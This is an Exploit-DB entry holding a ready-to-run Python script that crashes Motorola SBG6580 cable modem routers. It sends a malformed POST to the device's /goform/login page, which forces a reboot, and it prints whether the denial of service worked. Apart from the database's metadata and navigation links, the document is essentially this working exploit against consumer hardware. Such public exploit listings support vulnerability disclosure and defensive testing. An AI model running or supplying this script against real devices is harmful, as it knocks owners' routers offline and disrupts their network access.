Motorola SBG6580 Cable Modem & Wireless Router - Reboot (Denial of Service)

EDB-ID:

30688

CVE:


EDB Verified:

Author:

nicx0

Type:

dos

Exploit:   /  

Platform:

Hardware

Date:

2014-01-04

Vulnerable App: 
# Exploit Title: Motorola SBG6580 Cable Modem & Wireless-N Router Denial of Service
# Date: 01/03/14
# Exploit Author: nicx0
# Vendor Homepage: http://www.motorola.com/
# Software Link: http://www.motorola.com/us/SBG6580-SURFboard%C2%AE-eXtreme-Wireless-Cable-Modem/70902.html
# Version: SBG6580-6.5.0.0-GA-00-226-NOSH
# POSTing a bad login page parameter causes the router to reboot.

import sys
import socket
import urllib2
import urllib
router_ip = ''
try:
      router_ip = str(sys.argv[1])
except:
      print 'motobug.py ip_address : e.g. motobug.py 192.168.0.1'
      sys.exit(2)
query_args = {'this_was':'too_easy'}
url = 'http://' + router_ip + '/goform/login'
post_data = urllib.urlencode(query_args)
request = urllib2.Request(url, post_data)
try:
	print '[+] Sending invalid POST request to ' + url + '...'
	response = urllib2.urlopen(request,timeout=5)
except socket.timeout:
	print '[+] Success! No response from the modem.'
except urllib2.HTTPError:
	print '[-] Failed: HTTP error received. The modem might not be a SBG6580.'
except urllib2.URLError:
	print '[-] Failed: URL error received. Check the IP address again..'
else:
	print '[-] Failed: HTTP response received. Modem does not appear to be vulnerable.'
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services